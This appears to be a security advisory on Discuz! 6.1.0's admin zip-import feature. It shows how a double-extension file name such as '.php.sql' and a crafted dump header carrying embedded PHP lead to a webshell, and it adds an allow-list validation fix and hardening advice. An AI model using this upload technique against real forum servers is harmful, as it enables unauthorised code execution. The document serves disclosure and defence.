Because Discuz!'s admin\database.inc.php extracts a zip file when action=importzip, it is possible to obtain a webshell.
The code in admin\database.inc.php:
.....
elseif($operation == 'importzip') {

    require_once DISCUZ_ROOT.'admin/zip.func.php';
    $unzip = new SimpleUnzip();
    $unzip->ReadFile($datafile_server);
    if($unzip->Count() == 0 || $unzip->GetError(0) != 0 || !preg_match("/\.sql$/i", $importfile = $unzip->GetName(0))) {
        cpmsg('database_import_file_illegal', '', 'error');
    }

    $identify = explode(',', base64_decode(preg_replace("/^# Identify:\s*(\w+).*/s", "\\1", substr($unzip->GetData(0), 0, 256))));
    $confirm = !empty($confirm) ? 1 : 0;
    if(!$confirm && $identify[1] != $version) {
        cpmsg('database_import_confirm', 'admincp.php?action=database&operation=importzip&datafile_server=$datafile_server&importsubmit=yes&confirm=yes', 'form');
    }

    $sqlfilecount = 0;
    foreach($unzip->Entries as $entry) {
        if(preg_match("/\.sql$/i", $entry->Name)) {
            $fp = fopen('./forumdata/'.$backupdir.'/'.$entry->Name, 'w');
            fwrite($fp, $entry->Data);
            fclose($fp);
            $sqlfilecount++;
        }
    }
......

Two points to note:
1. preg_match("/\.sql$/i", $importfile = $unzip->GetName(0)) only requires the name to end in .sql, so Apache's multiple-extension handling can be exploited with a file name like 081127_k4pFUs3C-1.php.sql.
2. $identify = explode(',', base64_decode(preg_replace("/^# Identify:\s*(\w+).*/s", "\\1", substr($unzip->GetData(0), 0, 256)))); so the file format must be respected: [make a backup first, then modify the dump and repackage it as a zip]

# Identify: MTIyNzc1NzEyNSw2LjEuMCxkaXNjdXosbXVsdGl2b2wsMQ==
# <?phpinfo();?>
# <?exit();?>
# Discuz! Multi-Volume Data Dump Vol.1
# Version: Discuz! 6.1.0
# Time: 2008-11-27 11:38
# Type: discuz
# Table Prefix: cdb_
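The root cause above is that the import path accepts any entry name ending in .sql and writes it, with that name, into a web-reachable directory. The following is an added example, written here for illustration and not Discuz!'s own code (the function names isSafeSqlEntryName and rejectedEntryNames are hypothetical), showing a strict allow-list check that would refuse double-extension names such as 081127_k4pFUs3C-1.php.sql and path components, and that is applied to every entry rather than only the first one:

```php
<?php
// Added example (not Discuz! code): strict allow-list validation for the
// names of entries extracted from an uploaded backup zip, meant to replace
// the loose "/\.sql$/i" test shown in the write-up.

/**
 * Return true only for a plain file name of the form <token>.sql, where the
 * token contains just letters, digits, '_' and '-'. Names carrying a directory
 * part, a second extension, or any other characters are refused.
 */
function isSafeSqlEntryName($name)
{
    // No directory components: blocks "../" and absolute paths inside the archive.
    if ($name !== basename($name)) {
        return false;
    }
    // Exactly one dot, and the only extension is .sql (case-insensitive).
    return (bool) preg_match('/^[A-Za-z0-9_-]+\.sql$/i', $name);
}

/**
 * Apply the check to every entry that would be written, and return the list of
 * rejected names so the caller can abort the whole import before writing anything.
 */
function rejectedEntryNames(array $entryNames)
{
    $rejected = array();
    foreach ($entryNames as $name) {
        if (!isSafeSqlEntryName($name)) {
            $rejected[] = $name;
        }
    }
    return $rejected;
}

// Constructed sample entry list mirroring the case described in the write-up.
$sample = array(
    '081127_k4pFUs3C-1.sql',       // legitimate backup volume: accepted
    '081127_k4pFUs3C-1.php.sql',   // double extension: refused
    '../backup.sql',               // path traversal: refused
    'dump.SQL',                    // upper-case extension only: accepted
);

$bad = rejectedEntryNames($sample);
if (count($bad) > 0) {
    // In the real handler this is where cpmsg('database_import_file_illegal', ...)
    // would be raised instead of proceeding to the write loop.
    echo "Import refused; offending entries:\n";
    foreach ($bad as $name) {
        echo "  $name\n";
    }
} else {
    echo "All entry names acceptable.\n";
}
```

Name validation alone is not a complete fix: the backup directory under forumdata/ should also be configured in the web server so that nothing in it is ever executed as a script, which removes the impact of any file that does get written there.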
Discuz! 6.1.0